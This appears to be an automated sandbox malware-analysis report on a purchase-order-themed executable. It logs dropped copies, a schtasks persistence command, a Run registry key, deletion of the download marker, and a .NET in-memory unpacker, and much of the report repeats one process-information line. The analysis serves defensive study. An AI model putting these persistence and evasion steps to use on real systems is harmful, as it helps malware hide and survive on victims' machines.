Source: C:\Users\user\Desktop\PO #047428.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PO #047428.exe	Virustotal: Detection: 56%
Source: PO #047428.exe	ReversingLabs: Detection: 30%

Source: PO #047428.exe	String found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
Source: PO #047428.exe	String found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
Source: PO #047428.exe	String found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
Source: PO #047428.exe	String found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail

Source: C:\Users\user\Desktop\PO #047428.exe

File read: C:\Users\user\Desktop\PO #047428.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO #047428.exe 'C:\Users\user\Desktop\PO #047428.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\PO #047428.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmp3604.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
Source: C:\Users\user\Desktop\PO #047428.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process created: C:\Users\user\Desktop\PO #047428.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmp3604.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}	Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO #047428.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO #047428.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: PO #047428.exe, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: yXAQfeQN.exe.0.dr, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.PO #047428.exe.7a0000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.PO #047428.exe.7a0000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: kprUEGC.exe.4.dr, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.PO #047428.exe.cd0000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.PO #047428.exe.cd0000.1.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.kprUEGC.exe.fd0000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.kprUEGC.exe.fd0000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 18.0.kprUEGC.exe.3f0000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 18.2.kprUEGC.exe.3f0000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.0.kprUEGC.exe.b30000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.kprUEGC.exe.b30000.1.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 20.2.kprUEGC.exe.540000.0.unpack, GuideListFormatter/GuideListFormatter.cs	.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_062D8530 push es; ret	4_2_062D8540
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_062D850A push es; ret	4_2_062D8540
Source: C:\Users\user\Desktop\PO #047428.exe	Code function: 4_2_062DC872 push es; ret	4_2_062DC880
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Code function: 14_2_0743599C push DCE805C0h; iretd	14_2_074359A1

Source: initial sample	Static PE information: section name: .text entropy: 7.95157187123
Source: initial sample	Static PE information: section name: .text entropy: 7.95157187123
Source: initial sample	Static PE information: section name: .text entropy: 7.95157187123

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\PO #047428.exe	File created: C:\Users\user\AppData\Roaming\yXAQfeQN.exe			Jump to dropped file
Source: C:\Users\user\Desktop\PO #047428.exe	File created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp'

Source: C:\Users\user\Desktop\PO #047428.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC			Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe

File opened: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
